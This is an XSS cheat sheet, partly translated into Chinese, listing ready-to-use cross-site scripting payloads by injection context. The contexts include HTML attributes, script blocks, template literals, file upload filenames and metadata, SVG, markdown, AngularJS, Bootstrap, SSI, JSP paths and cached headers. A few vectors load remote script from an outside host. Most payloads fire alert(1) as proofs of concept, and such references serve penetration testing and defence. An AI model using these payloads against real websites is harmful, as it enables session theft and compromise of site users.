XSS Cheat Sheet
BASICS
- HTML注入
当输入位于HTML标记的属性值内或标记的外部(下一种情况中描述的标记除外)时使用。如果输入在HTML注释中,则在payload前加上“-->”
<svg onload=alert(1)>
"><svg onload=alert(1)>
- HTML注入-标签块突破
当输入落在以下标签的内部或打开/关闭之间时使用:
<title><style><script><textarea><noscript><pre><xmp><iframe>
</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)>
- HTML注入-内联
当输入落在HTML标记的属性值内,但该标记不能以大于号(>)结束时使用
"onmouseover=alert(1) //
"autofocus onfocus=alert(1) //
- HTML注入-源文件
当输入作为下列HTML标记属性的值:href、src、data或action(也包括formaction)时使用。脚本标记中的Src属性可以是URL或“data:,alert(1)”。
javascript:alert(1)
-
Javascript注入
当输入位于脚本块中,在字符串分隔的值内时使用
'-alert(1)-'
'/alert(1)//
-
Javascript Injection - Escape Bypass
当输入位于脚本块中,在字符串分隔值内,但引号用反斜杠转义时使用。
\'/alert(1)//
- Javascript Injection – Script Breakout
</script><svg onload=alert(1)>
ADVANCED
- Javascript Injection - Logical Block
当输入在脚本块中、在字符串分隔值中、在单个逻辑块(如函数或条件块)(if、else等)中着陆时,使用payload1或payload2。如果引号用反斜杠转义,请使用payload3。
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
- Javascript Injection - Quoteless
使用时,有多个反射在同一行JS代码
/alert(1)//\
/alert(1)}//\
- Javascript上下文——模板文字中的占位符注入
当输入位于用反号(' ')分隔的字符串内或在模板引擎中时使用
${alert(1)}
- 多反射HTML注入-双反射(单输入)
用于利用同一页面上的多个反射
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
- 多反射HTML注入-三反射(单输入)
用于利用同一页面上的多个反射。
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
- Multi Input Reflections HTML Injection - Double & Triple(多次输入)
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
q=<script/&q=/src=data:&q=alert(1)>
- File Upload Injection – Filename
当上传的文件名在目标页的某个地方反映出来时使用。
"><svg onload=alert(1)>.gif
- File Upload Injection – Metadata
Use when metadata of uploaded file is reflected somewhere in target page. It uses
command-line exiftool (“$” is the terminal prompt) and any metadata field can be set.
当上传文件的元数据在目标页面某处反映时使用。它使用命令行exiftool($是终端提示符),可以设置任何元数据字段。
$ exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg
- File Upload Injection – SVG File
用于在上传图像文件时在目标上创建存储的XSS。将下面的内容保存为
“xss.svg”。
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
- DOM Insert Injection
<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
<svg><svg onload=alert(1)>
- DOM Insert Injection – Resource Request
本机javascript代码将请求的结果插入到可由攻击者控制的URL中时使用。
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>
- PHP Self URL Injection
当前URL被目标的底层PHP代码用作属性值时使用
例如,HTML表单。在php扩展和查询部分(?)的开始之间使用斜杠(/)注入。
https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader
- Markdown Vector
用于文本框、注释部分等允许某些标记输入的地方。 Click to fire.
[clickme](javascript:alert1
)
[clickme](javascript:alert`1`)
- Script Injection - No Closing Tag
Use when there’s a closing script tag (</script>
) somewhere in the code after reflection.
<script src=data:,alert(1)>
<script src=//brutelogic.com.br/1.js>
- Javascript postMessage() DOM Injection (with Iframe)
Use when there’s a “message” event listener like in “window.addEventListener(‘message’, ...)”
in javascript code without a check for origin. Target must be able to be framed (X-Frame
Options header according to context). Save as HTML file (or using data:text/html) providing
TARGET_URL and INJECTION (a XSS vector or payload).
<iframe src=TARGET_URL onload="frames[0].postMessage('INJECTION','*')">
- XML-Based XSS
Use to inject XSS vector in a XML page (content types text/xml or application/xml).
Prepend a “-->” to payload if input lands in a comment section or “]]>” if input lands in a
CDATA section.
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script>
<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="//brutelogic.com.br/1.js"/>
- AngularJS Injections (v1.6 and up)
Use when there’s an AngularJS library loaded in page, inside an HTML block with ng-app
directive (1 st payload) or creating your own (2 nd one).
{{$new.constructor('alert(1)')()}}
<x ng-app>{{$new.constructor('alert(1)')()}}
- Onscroll Universal Vector Onscroll通用矢量
当使用onscroll事件处理程序时,用于XSS而不需要用户交互。
It works with
address, blockquote, body, center, dir, div, dl, dt, form, li, menu, ol, p, pre, ul, and h1 to h6
HTML tags.
<p style=overflow:auto;font-size:999px onscroll=alert(1)>AAA<x/id=y></p>#y
-
Type Juggling
Use to pass an “if” condition matching a number in loose comparisons.
1<svg onload=alert(1)>
1"><svg onload=alert(1)>
- XSS in SSI
Use when there’s a Server-Side Include (SSI) injection.
<<!--%23set var="x" value="svg onload=alert(1)"--><!--%23echo var="x"-->>
- SQLi Error-Based XSS
用于可以触发SQL错误消息的端点(使用引号或反斜杠)。
'1<svg onload=alert(1)>
<svg onload=alert(1)>\
- Injection in JSP Path
Use in JSP-based applications in the path of URL.
//DOMAIN/PATH/;<svg onload=alert(1)>
//DOMAIN/PATH/;"><svg onload=alert(1)>
- JS Injection - ReferenceError Fix
用于修正一些挂起的javascript代码的语法。检查控制台标签在浏览器
开发工具(F12)为各自的ReferenceError和替换相应的var和函数名。
(Use to fix the syntax of some hanging javascript code. Check console tab in Browser
Developer Tools (F12) for the respective ReferenceError and replace var and function
names accordingly.)
';alert(1);var myObj='
';alert(1);function myFunc(){}'
- Bootstrap Vector (up to v3.4.0)
Use when there’s a bootstrap library present on page. It also bypass Webkit Auditor, just
click anywhere in page to trigger. Any char of href value can be HTML encoded do bypass
filters.
<html data-toggle=tab href="<img src=x onerror=alert(1)>">
- Browser Notification
用作提示、提示和确认弹出窗口的另一种选择。它需要用户接受(第1个有效载荷),但是一旦用户之前为该站点进行了授权,就可以使用第2个有效载荷。
Notification.requestPermission(x=>{new(Notification)(1)})
new(Notification)(1)
- XSS in HTTP Header - Cached
Use to store a XSS vector in application by using the MISS-MISS-HIT cache scheme (if
there’s one in place). Replace with your respective vector and TARGET with a dummy
string to avoid the actual cached version of the page. Fire the same request 3 times.
$ curl -H "Vulnerable_Header: <XSS>" TARGET/?dummy_string